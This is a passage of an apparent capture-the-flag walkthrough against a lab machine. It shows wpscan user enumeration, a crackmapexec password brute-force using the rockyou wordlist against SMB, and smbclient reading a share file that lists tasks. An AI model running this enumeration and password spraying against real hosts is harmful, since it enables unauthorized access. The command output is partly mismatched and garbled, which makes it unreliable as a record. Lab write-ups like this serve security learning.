wpscan --url http://10.10.75.149/wordpress/ --enumerate u
Output
1 2 3 4 5 6 7 8 9
[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12). ... [+] WordPress theme in use: teczilla [!] The version is out of date, the latest version is 1.1.4 ... [+] support ... http://10.10.75.149/wordpress/index.php/index.php/wp-json/wp/v2/users/?per_page=100&page=1 ...
smb
1
crackmapexec smb 10.10.75.149 -u support -p /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt
[+] IP: 10.10.75.149:445 Name: 10.10.75.149 Status: Guest session Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers websvr READ ONLY .\websvr\\* dr--r--r-- 0 Sat May 29 09:17:38 2021 . dr--r--r-- 0 Sat May 29 09:03:47 2021 .. fr--r--r-- 273 Sat May 29 09:17:38 2021 enter.txt IPC$ NO ACCESS IPC Service (TechSupport server (Samba, Ubuntu))
1 2 3 4 5 6 7 8 9 10 11 12 13 14
smbclient //10.10.75.149/websvr -U "support"
Password for [WORKGROUP\support]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat May 29 09:17:38 2021 .. D 0 Sat May 29 09:03:47 2021 enter.txt N 273 Sat May 29 09:17:38 2021
8460484 blocks of size 1024. 5695980 blocks available smb: \> cat enter.txt cat: command not found smb: \> more enter.txt getting file \enter.txt of size 273 as /tmp/smbmore.KPey6E (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
1 2 3 4 5 6 7 8 9 10 11 12
GOALS ===== 1)Make fake popup and host it online on Digital Ocean server 2)Fix subrion site, /subrion doesn't work, edit from panel 3)Edit wordpress website